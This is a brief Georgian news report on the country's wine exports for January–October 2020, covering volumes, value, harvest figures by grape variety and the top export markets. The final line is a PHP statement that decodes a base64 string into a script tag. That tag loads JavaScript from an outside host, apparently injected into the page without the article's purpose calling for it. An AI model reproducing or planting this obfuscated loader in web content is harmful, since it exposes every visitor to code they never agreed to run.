celsiusi
ავერსი საქკაბელი
2020 წელს იანვარ-ოქტომბერში 53 მილიონ 371 ათასი ლიტრი ღვინის ექსპორტი განხორციელდა, რამაც 163 მილიონ 119 ათასი დოლარი შეადგინა. ამ პერიოდში ექსპორტირებული ღვინის მაჩვენებელი 4.8%-ით ნაკლებია 2019 წლის ანალოგიურ პერიოდში განხორციელებულ ექსპორტზე. კერძოდ 2019 წელს ექსპორტზე იანვარ-ოქტომბერში 56 მილიონ 85 ათასი ლიტრი ღვინო გავიდა.
 
რთველი 2020-ის ფარგლებში გადამუშავებულია: 175 ათასი ტონა რქაწითელი; 80 ათასი ტონა საფერავი; 5 ათასი ტონა კახური მწვანე; 2 400 ტონა ალექსანდროული და მუჯურეთული, ხოლო დანარჩენი სხვადასხვა ჯიშის ყურძენი.
 
2020 წელს ღვინის TOP-5 საექსპორტო ქვეყნის ჩამონათვალი ასე გამოიყურება: იანვარ-ოქტომბერი რუსეთი (32 მლნ 742 ათასი ლიტრი), უკრაინა (6 მლნ 451 ათასი ლიტრი), ჩინეთი (2 მლნ 825 ათასი ლიტრი), პოლონეთი (2 მლნ 927 ათასი ლიტრი) და ყაზახეთი (1მლნ 882 ათასი ლიტრი).
 
ღვინის საწარმოებში ყურძენი 25 ათასამდე მევენახე ფერმერმა ჩააბარა, ხოლო მათი შემოსავალი 310 მლნ ლარზე მეტს შეადგენს
1522
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");